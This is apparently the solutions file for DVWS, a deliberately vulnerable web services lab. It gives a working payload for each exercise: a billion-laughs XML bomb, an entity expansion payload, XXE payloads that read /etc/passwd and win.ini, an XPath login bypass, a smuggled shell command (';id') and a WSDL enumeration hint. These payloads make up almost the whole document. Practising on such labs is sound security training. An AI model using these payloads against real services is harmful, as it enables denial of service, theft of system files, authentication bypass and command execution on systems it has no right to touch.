// Solutions


[WSDL Enumeration]

URL: dvws/vulnerabilities/wsdlenum/service.php?wsdl

check_user_id with value root

----------------------------------------------------------------------------------------------------------

[XML Bomb]


URL: /dvws/vulnerabilities/xmlbomb/xmlbomb.php


<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>




----------------------------------------------------------------------------------------------------------


URL : /dvws/vulnerabilities/xxe/

[XML Entity Expansion]

<!DOCTYPE foo [<!ENTITY entity0 "foo"><!ENTITY entity1 "&entity0;&entity0;"><!ENTITY entity2 "&entity1;&entity1;"><!ENTITY entity3 "&entity2;&entity2;">]><name>foo and&entity3;</name>


[XXE]

name=<?xml version="1.0"?>
<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<test>&xxe;</test>
 
 
name=<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]><test>&xxe;</test>

----------------------------------------------------------------------------------------------------------

[X PATH]

URL: /dvws/vulnerabilities/xpath/xpath.php



username: foo' or 1=1 or 'a'='a 
password: bar



----------------------------------------------------------------------------------------------------------

[Command Injection]

URL: /dvws/vulnerabilities/cmdi/client.php

name=-s ;id



----------------------------------------------------------------------------------------------------------


URL : /dvws/vulnerabilities/xxe2/



[XXE 2]

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<uservalue>
<value>&xxe;</value>
</uservalue>
